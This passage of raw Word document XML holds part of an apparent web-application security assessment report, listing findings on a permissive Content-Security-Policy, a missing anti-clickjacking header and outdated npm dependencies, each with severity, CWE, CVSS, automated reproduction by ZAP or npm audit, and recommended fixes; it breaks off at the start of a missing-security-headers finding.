                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A05:2021 — Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1C499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5D24BC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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5F6576">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-693: Protection Mechanism Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="78D6C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1C2EED">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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61924D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="29047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3CDAC1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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7092F3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The CSP header is set to: default-src * 'unsafe-inline' 'unsafe-eval' blob: data:. This permits scripts from any origin, inline scripts, and eval(). The frame-ancestors and form-action directives are not defined. This CSP provides zero protection against XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3CB33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EE5528">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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39E4A5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CSP is the browser's last line of defense against XSS. With this configuration, even if other XSS mitigations are in place, the browser will not block injected scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2137F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EC0DB8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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759D77">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Automated: ZAP flags this as 5 separate medium findings (wildcard, unsafe-eval, unsafe-inline, style-src unsafe-inline, missing directives).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="567F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EE4CDF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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432504">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tighten CSP: Remove wildcards. Set script-src to 'self' with nonces for epub.js. Add frame-ancestors 'self'. Add form-action 'self'.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3390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E000DD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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446BD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B189A64">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9B11AB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-010: Missing Anti-Clickjacking Header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422D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DA1CFA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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C4768D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1A3B7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3FC79F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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E43405">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No X-Frame-Options or frame-ancestors CSP Directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6AC6C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891FE6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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41FD6E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST — OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4464A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A44C19">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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0E66DFD4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="73F8F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6584BC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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006F7B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A05:2021 — Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="00DF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611CF4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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BE653F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-1021: Improper Restriction of Rendered UI Layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="05AF4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F61691">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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233894">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="08580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B9CB7F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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90CECD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The application does not set X-Frame-Options header or CSP frame-ancestors directive. An attacker can embed the application in an iframe on a malicious site and trick users into clicking UI elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="66951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00E249">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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3FCA4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Clickjacking attacks can trick users into performing unintended actions (e.g., deleting books, changing settings).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3357F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E62CC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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39BBA5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Automated: ZAP detects missing header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0276D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C2727F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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74C068">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Add helmet middleware: app.use(helmet({ frameguard: { action: 'deny' } })). Or add header: res.setHeader('X-Frame-Options', 'DENY').</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="661F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92B2B7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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8568A2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12F01C88">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DB1911">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-011: Vulnerable Dependencies — Moderate Severity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2EBD5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BBA364">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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035C29">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-011</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E48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107EFB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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F12314">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>follow-redirects, ip-address, postcss Have Moderate Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="23325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5941B3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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688D91">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SCA — npm audit (automated pipeline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="13796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12A651">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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2358B1C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1EF29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1A15C5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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DD1A91">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021 — Vulnerable and Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="15A9B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AD66B2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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35D830">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-1395: Dependency on Vulnerable Third-Party Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3E00D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6EAFD3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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7A95BF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.0-6.0 (multiple CVEs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="25398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C082CA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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79D662">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>follow-redirects &lt;=1.15.11 leaks custom auth headers on cross-domain redirects. ip-address &lt;=10.1.0 has XSS in Address6 methods (affects express-rate-limit 8.0-8.5). postcss &lt;8.5.10 has XSS via unescaped &lt;/style&gt; in stringify output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3DF1C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702BA4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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E3060D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Auth header leakage could expose credentials during redirects. XSS in rate-limit dependency is low practical risk but indicates outdated packages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="69D87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A8CCDB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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97776D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Automated: npm audit detects all three.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E9B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3AC4D1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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E06188">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run: npm audit fix to upgrade all three packages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12E86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00320D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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44B2A2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26ADDA35">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A80FE86">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.4 Low Severity Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0581E58F">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75281F96">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-012: Missing Security Headers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5E8C2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C6BF57">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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E5B87D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-012</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D68E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FC5948">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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6A9ED8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
